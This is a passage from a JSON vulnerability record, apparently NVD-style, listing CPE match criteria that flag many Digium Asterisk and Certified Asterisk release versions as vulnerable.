              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84F88075-9935-45BF-88B7-21ACE8AAB314",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F79D5F-EB28-417A-86DF-053D6EDBA161",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4A036F91-70E0-4E97-9896-EEE97BE3C20E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3DA61A22-3DD0-46A3-8C13-F25F4F03FD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "791700CD-E007-489E-9BC6-37025CAA8144",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C6EA7154-7F08-4E43-9270-E617632230AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "4149F36C-D455-415F-93D7-F92EEE41419D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2DC51129-8F38-4505-90FB-4FFDED45BABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4CA571E0-B513-47AA-95BE-EB4DD2AA91E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A62DFFE-637B-4911-B3B4-6DA4053CBDBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F7C5D35-A6AE-4A2E-98C5-CB58FF22AF08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D23CE302-AC62-468C-96B3-1EF430825170",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3CD4A85-26FB-4AE5-9CB7-4DF38DF32482",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8DD16DF-C47C-41CF-8CDE-C365103262A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "43C06F98-62F4-4008-A463-2791BEDF6DED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "133288EC-8A78-4C9D-BF94-9900CD3D2260",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B2E54998-B257-478E-9E52-2BB4F4CD6429",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FD4498A-72BD-40EB-A332-DE10C87C1015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71961599-009C-42F4-AA26-9B16C39F3CBC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B98A2EA6-DCC6-4F8B-B132-6692AED16CF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "672EDC0E-D70A-4BB0-B7FE-5D422C737862",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "C779E0D4-0375-4BE8-9667-A32C68B66D60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:*:*:*:standard:*:*:*",
              "matchCriteriaId": "6DEF3D58-73E0-402A-A15F-05CA72B5B288",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8E9E50F8-0123-4C9E-88E1-5DCE08770B68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F7C605A3-8517-4215-9AD3-980D587B22DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "866815AE-D1FE-460C-A3BC-70C251655C1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "44746060-BC6F-4E6D-BA81-61623B2D27FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47548ADE-255A-4355-BD06-1FEF134C1620",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "ABCFC4D9-8054-4F42-BE7E-5092F6648F95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "84A7DBB5-999C-4AE8-BC5D-F0C5F77957DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "E7D1238A-A8D2-485E-81FD-46038A883EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D5BA542E-4667-4D9E-BDAE-FED6CA63F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "83C8E7EC-0D4C-40E2-9EE1-4AB5F03464D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "93F2B062-09B4-44F1-87E4-6104B757B557",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "F2877B09-B0B9-4AD4-906A-D40E25DDC4BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "11AAE0EA-D7EB-4341-A412-FBCDC99565A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "37F93124-25D9-44ED-B4AB-1B3552FCAB09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "E4CB22F6-9F63-427C-B2D2-7ABB9B4F7694",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "758AB27B-7C40-41ED-9FC3-BE3D682EE48A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "07D3186A-CD6F-432A-8653-4CFBA37B9864",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "746FB2E6-EF66-4EF3-946C-111FB7728EBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "91D933DB-06F7-45A4-A517-BFAEC82DDB7D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "3AAB500F-8F0D-4534-B659-C495D1799913",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F5C5156-CC72-4AB5-A927-E874199EBD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "AB912D4D-6BA4-4AEF-BBFD-EABFED240015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "68C78C16-3807-4272-9B46-9D9AF5150879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.2.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "02E13D3A-B37B-4215-82E0-3FCE5E35B00A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BE0F93D1-7602-47AC-9ACE-AA850D7DFD23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "956BCED3-1818-4673-A0F4-E7F03F366D99",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B58ACCC-0255-46B1-8517-EDCD85AA0F35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A921B590-57C2-4E0A-B28B-D0E48F5E1B58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "70F0AE7B-9E53-4E3B-AA9E-EAF7C4C31E1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5DE6F187-7236-4622-BD62-1E5F0742B41B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F70DDB6D-BE16-4375-87AE-E5E2B5862D17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6910E07C-3ACA-414F-B468-13E4BF9BE938",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "837A07D7-C2FD-4077-A0AD-AF2147E04B84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.5.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B2A99209-E8C5-44E6-A8DA-7FC07FBA6D87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "18985B4A-4C54-4EC6-9274-15E7DCFEC94D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "48AE70AD-85BE-44DE-BC75-1690C27821B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "804F861A-81E1-45C5-A7D3-0E73770AC155",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0AE503BD-F9BD-4396-B27D-184AE06F594D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9CD9A213-27F7-410E-97B1-E7405B4FCECE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "10FFDE4F-0B30-43C3-9475-80259D5E9055",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5F30E2AB-B354-4583-9D76-9DF1727407A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DBDFE57E-EEBF-4722-B6D0-147F72018DE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902A2600-49A7-4013-A621-9EE94F1E8435",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7021D54A-D443-492A-AE8C-62F2B85A1F37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B003CB5A-A95A-481F-B762-79C476829D81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84C8BB88-FBE3-4C82-9D53-E34AA7B6A73E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "F8037EB0-42FA-45BA-9E8E-D279432EC4CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "E374559C-E550-4BB9-9682-9C4535EAE9A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "FFFB7E8B-C963-4ACB-AE37-9E4938A5462E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF83EAD3-3CC1-4C1B-AAB8-0FE03BB67EC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E3F75AF0-A4E0-425E-B707-ED1F58C9CC83",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "745EC4D8-5E19-48C8-8609-11A74DC18266",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F1871DC4-AA58-4C04-9D6A-4FF383C56405",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8560DBD-A70E-4033-AE2E-96DA373AB425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E08ECE50-3A53-45C1-8BEA-8B9E024E22F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "59C2E58B-EEB3-4E8D-940C-2DF846923B19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D40F2ADC-6F79-410F-9063-1354C15F0D8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "27E0B1E7-1DA3-47C4-AA2A-54D4C2C48A8D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "82F91FE8-C320-466B-AF08-67319A00A2BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "DCFF0E1C-B455-4C18-8AA1-10408234327B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "738F68B3-2C5E-4A09-8FF4-2D034ED0C54D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6A60C223-AD68-4BFF-91C1-2C7E9F727AA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "4C313F81-8B38-4845-B1C7-CBB23D7C99B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "A08731AB-1E43-48B9-AB4C-0B06A34D0807",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "5A4FBB03-4A60-4A34-855B-74C5079F7769",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "66E97D3F-3AEB-40EB-87E7-18EC7A84F0CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "69E55195-84CC-46DB-9E49-DEB864DF0659",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7F58B52D-9510-465F-8BFB-6896B4D36F5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "59E72AD4-90BE-4C3B-B457-31FF193712FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "81EB266E-40BC-45EA-8EDB-4766011C460B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E23FCBC3-30EF-47BC-AEFE-073E84B6DBA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5AB33EDF-29D7-4092-91FE-505B39D3E57B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4F698874-028E-410B-90FE-FDD441F55C32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "081DA344-7266-4D67-8B92-830F43B42CC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "01851B4A-F7CB-4263-B06C-92D39A693530",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BB95638-D09F-4F02-9076-49BE93F2A407",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E2DD3AF-EF01-4A1A-AF9A-98575E36D088",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "163E8F93-432A-4F68-B309-7A38AE1A30FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F53C384F-75DD-4A29-8907-BA95F08B1465",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:-:*:*:*:*:*:*",
              "matchCriteriaId": "6BB940E4-E612-4B27-9188-E794665191B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "2365F1EE-16A4-4293-B80E-A51CD6A2F112",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6952FFDE-92D0-4A75-AABB-113E6FAF5A31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5735354A-CF57-4A9A-9607-169CE50E0655",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "38E0B2C4-55EA-4712-8E75-24A5718F9FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F087C546-FBCA-4D0D-A023-8F9384CD160C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "832F5503-6354-4E39-B927-3BA9606A372D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "9E23AF8A-63B2-4597-8E78-A4672B0C44B3",
              "vulnerable": true
            },
            {
